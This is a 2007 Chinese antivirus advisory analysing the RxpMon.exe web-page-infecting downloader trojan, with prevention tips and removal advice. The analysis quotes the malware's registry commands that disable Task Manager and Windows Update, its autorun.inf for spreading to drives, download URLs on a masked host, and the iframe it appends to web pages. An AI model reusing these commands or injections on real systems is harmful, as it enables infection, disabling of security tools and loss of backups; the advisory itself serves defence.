“网页感染器”RxpMon.exe病毒技术细节

新客网 XKER.COM 2007-11-27 来源： 新客网 收藏本文

病毒摘要：

危险等级：★★★
病毒名称：Trojan.DL.Win32.InfectHtm.a
截获时间：2007-11-19
入库版本：20.19.10
类型：病毒

感染的操作系统： Windows NT所有版本系统

威胁情况：

传播级别：低

全球化传播态势：低

清除难度：困难

破坏力：高

破坏手段：感染htm等网页文件，下载运行文件，点击网页、删除Ghost镜像文件

 

---

 

技术细节：

  这是一个具有下载、感染网页文件、点击网页等多种功能的下载型病毒。病毒由Delphi语言编写，upx加壳保护。

    病毒运行后进行如下操作：

检查运行方式：
 
    病毒运行后通过判断自己的文件名来确定运行方式，进行不同的操作，名称为“Sos.exe”，表示是写在逻辑盘或移动磁盘的、用于自动运行进行感染的病毒体。在这种情况下，病毒将当前路径作为命令行，启动explorer.exe ，同时复制自己为“%system%RxpMon.exe”并运行。名称为“RxpMon.exe”，表示病毒在本机系统目录下运行，病毒将进行下载、感染等主要工作。名称不为以上两个名称，表示病毒以其它名称进行感染，病毒将自己复制为“%system%RxpMon.exe”运行。同时病毒在当前目录生“文件名.bat”的文件（内容如下）并运行，删除自己。

病毒主操作行为：

    病毒名检查自己文件名为“RxpMon.exe”时，执行如下操作：

    1．写注册表键禁止系统功能：

    病毒多次调用"REG.exe"（应该是病毒的一部分，猜测是由病毒的安装程序同时释放的），传递如下参数生成注册表键，以此达到自动运行、禁止任务管理器、显示隐藏文件等系统功能：
"ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V crsss /T REG_SZ /D C:\WINNT\System32\RxpMoN.Exe /F"
' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies \WindowsUpdate  /v DisableWindowsUpdateAccess /t REG_dword /d 00000001 /f '
' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies \System /v Disable TaskMgr /t REG_dword /d 00000001 /f '
' add "HKCU\Software\Microsoft\Windows\CurrentVersion\EXPlorer\Advanced" /v Hidden /t re g_dWord /d 00000000 /f '
' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 00000001 /f '
' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHid den /t reg_dword /d 00000000 /f '
' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ Folder\Hidden\SHOWALL" /v CheckedValue /t REG_SZ /d 0 /f '
'add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\ NOHIDDEN" /v CheckedValue /t REG_dword /d 00000002 /f'

    2．下载文件

    病毒启动新的线程尝试调用URLDownloadToFileA下载如下文件
http://www.XXXX.cn/xzz/dh.txt 为 %system%\SvTh.exe
http://www. XXXX.cn/xzz/IE.txt为 %system%\ TDOb.COM
http://www. XXXX.cn/xzz/table.txt为 %system%\ TDOx.COM

    病毒下载后将执行SvTh.exe。

    3、修改IE主页

    病毒按照下载的IE.txt文件的内容修改如下注册表键，以修改IE主页：
"HKCU\Software\Microsoft\Internet Explorer\Main\Start Page"
HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage"

    4、定时不断感染逻辑磁盘（建立自动运行）

    病毒通过调用SetTimer函数，在TimerProc中，每隔1000毫秒进行如下操作：

    将如下内容写入“%systme% AUToRuN.InF”
 [AuToRuN]
 open=Sos.Exe
 shell\open=打开(&O)
 shell\open\Command=Sos.Exe
 shell\open\Default=1
 shell\explore=资源管理器(&X)
 shell\explore\Command=Sos.Exe

    复制“%systme% AUToRuN.InF”到各逻辑磁盘（类型为固定和可移动的）

    复制“%system%RxpMon.exe”到各逻辑磁盘（类型为固定和可移动的），名称为“Sos.exe”

    5、破坏杀毒软件

    病毒定时（SetTimer控制）搜索窗口破坏反病毒软件：

    搜索如下窗口，并向其发送WM_CLOSE消息：

    包含有字符串"病毒"、"木马"、"检测"、"wpe"的窗口

    包含有与下载的table.txt文件中的字符串相同的窗口

    检查前景窗口的类名是否为"#32770",如是则发送特定WM_COMMAND消息关闭特定 杀毒软件

    6、定时启动IE打开网页

    定时以隐藏方式启动IE，打开如下网址，以便为其增加点击率
 http:// XXXX.com/XZ.ASP
 http:// XXXX.com/TJ.ASP
 ttp:// XXXX.com/GM.ASP

    7、删除ghost的镜像文件

    病毒定时遍历所有磁盘，搜索后缀名为gho的文件并删除，以此删除ghost镜像文件。

    8、感染网页文件

    病毒定时遍历所有磁盘，搜索符合如下条件的网页文件进行感染：

    （1）名称为"INDEX.ASP"、"INDEX.PHP"、"DEFAULT.ASP"、"DEFAULT.PHP"、"CONN.ASP"的文件。

    （2）后缀名为".HTM"的文件

    病毒感染时将如下字符串写入被感染文件的最后：
<iframe src="http://www. XXXX.cn/all/index.htm?a" width="50" height="0" border="0"></iframe>

安全建议：

    1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级，瑞星杀毒软件每天至少升级三次。

    2 使用“瑞星系统安全漏洞扫描”，打好补丁，弥补系统漏洞。

    3 不浏览不良网站，不随意下载安装可疑插件。

    4 不接收QQ、MSN、Emial等传来的可疑文件。

    5 上网时打开杀毒软件实时监控功能。

    6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中，可以有效保护密码安全。

清除办法：

    瑞星杀毒软件清除办法：

    安装瑞星杀毒软件，升级到20.19.10版以上，对电脑进行全盘扫描，按照软件提示进行操作，即可彻底查杀。

• ·认识映象劫持技术原理与解决办法
• ·大水牛下载者分析及手工清除办法
• ·计算机病毒中毒症状、预防和系统恢复
• ·mdm.exe专杀以及处理方法
• ·手工清除病毒mdm.exe和RavMon.exe
• ·mdm.exe病毒的解决方法
• ·不再草木皆兵 三招对付捆绑木马！
• ·如何清除Taskmgr.exe病毒
• ·taskmgr.exe进程CPU占用率高的原因
• ·taskmgr.exe系统进程及相关病毒介绍
• ·QQ“缘”病毒taskmgr.exe狂占CPU内存
• ·警惕伪SoundMan.exe病毒 SoundMan.exe病毒清除办
• ·巧治Vista下U盘自动运行病毒方法
• ·计算机病毒的说明、预防和恢复
• ·病毒反抗杀毒软件主要手段
• ·经典九招 防止自动播放引来病毒